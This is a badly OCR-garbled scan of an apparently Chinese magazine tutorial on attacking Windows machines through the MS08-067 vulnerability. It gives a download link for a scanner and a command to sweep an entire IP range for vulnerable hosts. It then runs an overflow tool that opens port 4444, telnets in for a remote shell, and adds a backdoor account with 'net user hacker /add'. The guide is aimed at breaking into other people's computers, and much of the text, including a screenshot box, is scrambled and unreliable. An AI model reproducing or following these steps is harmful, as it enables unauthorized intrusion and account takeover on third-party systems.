⑤
输
八
文件
名
“
c h
e c
k
.
b a t
”
。
⑥
单
击
“
保存
”
。
⑦
双击运行
该
b a t
文件
, 即
可
开启
所需的服
务
程
序
。
厂
,
》
入侵
扫
描
Ⅺ
扫
描纂
l P
段内受该翻洞影
响
的
圭
机
M S 0 8
-
0 6
7
漏洞扫描器
。
诊断哪
些
电脑包含该漏洞
。
刁
h
t t
p
:
//
w w w
.
r
a
y
f i l
e
.
c
o m /f
i
l e
s /d
2
2
1
c a 3 8
.
a a 3 c
.
1 1 d d
.
a c 2 f
.
0 0 1 4
2
2
1
b
7
9 8 a /
┏
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
┓
┃
一
… o
。 0 f
t Wi
n d o
u s
X P
f
淑
本
E
. 1
.
2 6 聃 ’
┃
┃
( c )
峨
代
泖 有
1 9 8 5 2 8
~t
l M i c r o s o f t c o p
p
.
┃
┃
【 ’
┃
┃
b
:
\D0 c I l n 。 11 t … d S e t t l n
g
s
\n
d
n i n i s t ”
£0
P
> c
:
w I
N D
O
'
J
S
\
T e n
p
\s 咖 . ㈣ T C P 2 2 1 . 日 . B . 1
_
┃
┃
2 2 1 . 2 2
s
. 2 Z S . 2 2
5
4 4 b 8 0
┃
┃
7 C
P P
o
r t
s … n
e r
U
1
.
1 B u ¨{ ¨ E
~ g
DI
-
o
p
┃
┃
N
o r n a l S c
d
l l
:
n
b o u t
T
0
S
c
d
n
1 4 8
~
1
3 4 2
5
1 P U s i n
,
J
日日 I h I
e a d o
┃
┃
C I R L
C 1 s P I
,
… e d
┃
┃
h
s t S …
l
:
2 2 1 .
-
谭
。
q
:
4
4
5
┃
┃
S c d I l 2 5 7 2 I P s C o n
p
l e t c l i i
0
Il o u l
‘
s
1
H
i n
u
t c : 3
7
S e
c
o
n d ~
.
F a u n d 0 Ho s t 0
┃
┃
c
:
"
,
D
a c
u
~
e
n t :, a n d S e t t 抽
g
s 、n d … ' i 0 t I - a t o l
t
>
┃
┗
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
━
┛
①
下
载
并解压扫描器到
某文件夫
下 , 如
“
C :\w in
do w s
\t
e
m
p
”
。
②
点
击
“
开
始
”
一
“
所有
程
序
”
一
“
附
件
”
一
“
命
令
提示符
”
③
输
入
扫描
命令
“
c :\w in
d o w s \te m
p
\s c a n . e x e T C P 2 2 1
. 0 . 0 . 1 2 2
2 5 5 . 2 5 5 . 2 5 5 4 5
5 8 0
”
,
并按下
回
车
键运行 。
r
f
本
次
扫
描
的 网
段
为
“
2 2
1
.
0
.
0
.
1
—
2 2 1
.
2 5 5
.
2 5 5
2 5 5
”
, 你
可 以
更
改
命
令
中
的
IP
部
分 ,
扫 描
别 的 网
段
。
④
抄
录
扫描到包含
该漏洞的
主
机
的
IP
地
址
。
r
f
扫
描
过
程
中
可
随
时
按
“
Ct r l
+
C
”
键
终
止
扫
描
,
已
扫
鲑型兰垫竺 兰王:
①
下
载
并解
压溢 出
工
具到
“
c :\w
i
n do w s \le m
Ⅳ
文
件
夫
②
运
行
“
命令提示符
”
。
③
输
八
命令
“
M
S
0 8 0 6
7 . e
x
e 2 2 1 . 0 . 0 . 2
”
,
回
车 。
2 2
1
.
0
.
0
.
2
是
本
次 扫
描
得 到 的
包
含 漏 洞
的
主
机
的
IP
, 在使 用 该
命
令 时
应
更
改
为你
亲
自扫
描
得 到 的
主 机
IP
。
④
命
令提
示符提示
“
S M B C o n n
e
c t
O
K
! S e n d
P
a
y
lo a d
O
v e r !
”
则
表明
溢
出
成功
。
通过 该
工
具
火
墙
均
可 溢 出
并
开 启
4 4 4 4
端
1
:3
无
论
对
方
电
脑 上
是 否
安 装有 网络 防
之 后
我
们
将通过 该
端
口
入
侵
电脑
。
口囫日蜀目皿
①
在命令
提示
符
中输
人
命令
“
t e ln
e t 2 2 1. 0
.
0
.
2
4 4 4 4
”
,
回
车。
如
命
令提
示
符
转
到
“
C
:
\
w i
ndo
w s
\
s
y
s t e m
3 2
”
则代 表
已 经
登
录到
对方
电脑
。
该
目
录
实为对方
电
脑 上
的
目
录
。
②
输
入
“
n e t u s
e
r
h a c k e r /
a dd
”
回
车
,
在刘
方电
脑
上
创建
一
个
账
户
。
③
输
入
“
n
e
t
u s e r
”
回
车 ,
检查
账
户是
否
创建成功 。
勰
、
∥
梦
肿
.
w赫
/
,
k
- 1
- 2
前往页